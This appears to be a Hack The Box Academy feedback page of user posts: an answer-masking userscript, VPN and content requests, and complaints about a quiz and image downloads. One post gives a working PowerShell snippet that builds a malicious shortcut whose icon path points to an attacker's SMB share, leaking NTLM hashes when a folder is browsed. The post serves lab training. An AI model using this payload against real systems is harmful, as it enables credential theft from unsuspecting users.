Academy

Hi guys, Recently I was re-doing some of the modules and it was fraustrating seeing the answers that I've already given to some of the questions. So, I made this simple JS script which helps to show/hide answers on Academy. It was useful to me, so I posted on Reddit so other people can also use it. It actually got some positive feedback and somebody recommended me posting it here, so maybe it can get enough votes to become a feature in the near future. The original Reddit post: https://www.reddit.com/r/hackthebox/comments/1pmcnvk/hiding_answers_on_academy The script: // ==UserScript== // HTB Academy – Hide/Show Answers // https://academy.hackthebox.com/module/* // u/run-at document-idle // ==/UserScript== (function () { const MASK = "********"; const processInputs = () => { document .querySelectorAll("input.form-control.text-success") .forEach(input => { if (input.dataset.processed) return; input.dataset.realValue = input.value; input.value = MASK; const btn = document.createElement("button"); btn.type = "button"; btn.textContent = "Show"; btn.className = "btn btn-outline-success"; let visible = false; btn.addEventListener("click", () => { visible = !visible; input.value = visible ? input.dataset.realValue : MASK; btn.textContent = visible ? "Hide" : "Show"; input.dispatchEvent(new Event("input", { bubbles: true })); }); input.after(btn); input.dataset.processed = "true"; }); }; processInputs(); const observer = new MutationObserver(processInputs); observer.observe(document.body, { childList: true, subtree: true }); })(); You need to have violentmonkey extension enabled in order to automatic applies on refreshes.

Currently, for non-Enterprise users, the only VPNs available in Academy is US/EU which leaves Pacific/SEA/Asia users with 2 bad options (200ms respectively) which tends to be unusable especially for modules that require RDP access. Would love some other options (i.e. Australia, Singapore) for VPNs.

What manages multiple cell towers in cellular networks? (Format: three words) . These towers are managed by Base Station Controllers (BSC), which oversee the operation of multiple towers. However when you enter in Base Station Controllers in any order it comes responds with incorrect answer? Am i missing something?

In the Windows privilege escalation module, section user interaction: https://academy.hackthebox.com/module/67/section/630 the example payload for the malicious lnk file works only when using the shortcut by clicking it. In order for it to be triggered when viewed in explorer the iconpath needs to be set to the target ip (otherwise this labs targeted account will not end up at responder) (i had to set the targetpath to something else like calc.exe in order to work, don't know why) so payload should be: $objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("C:\legit.lnk") $lnk.TargetPath = "calc.exe" $lnk.WindowStyle = 1 $lnk.IconLocation = "\\<attackerIP>\@pwn.png, 0" $lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request." $lnk.HotKey = "Ctrl+Alt+O" $ lnk.Save () Note that this is just for the Windows Server 2016 used in the example. Windows Server 2019 seems do work different.

Dear Support Team, I am writing to provide a little feedback: the configuration of links for images and technical diagrams now forces a file download instead of allowing direct viewing in a new browser tab. This is generating significant inconvenience in the technical learning and analysis process, especially with modules that contain small diagrams or screenshots. Why I'm writing this? Elimination of Quick Zoom: When images are small, the process of downloading, locating, and then opening the file with an external viewer is slow. Previously, by opening the image in a new tab, users could instantly use native browser zoom functionality for quick analysis. Workflow Disruption: The constant interruption of having to manage downloads and open files disrupts focus, which is critical when following a technical explanation or analyzing logs during a walkthrough. Inefficiency: Files (PNG/JPG) accumulate unnecessarily in the download folder, as the sole objective is temporary, quick viewing. Thank you very much for your time and for considering this feedback.

It would be really nice if the module went deeper into detail on actually discovering SQLi vulnerabilities. Going from the clear-output SQLi throughout the module into discovering the blind injection of the SA was a little frustrating without any extra guidance.

I'm enjoying CPTS's Penetration Tester job role path so far. This makes me wonder, will HTB introduce a ICS/OT Red Team and/or Penetration Tester job role path and certification in the future? Would really love to see this

Prerequisites are no longer provided inside a module in Academy 2.0. "Academy legacy" shows this under "Module Summary". This is helpful if you are not doing the modules in the order they are mentioned within a path.

We would like to have video content added to the training modules, as our students tend to gravitate more towards video-based learning, especially coming from platforms like Security Plus that offer video content and practice exams.

Hoping HTB will considering having a branch of content for cloud redteam/penetration test since nowadays everything seems cloud related.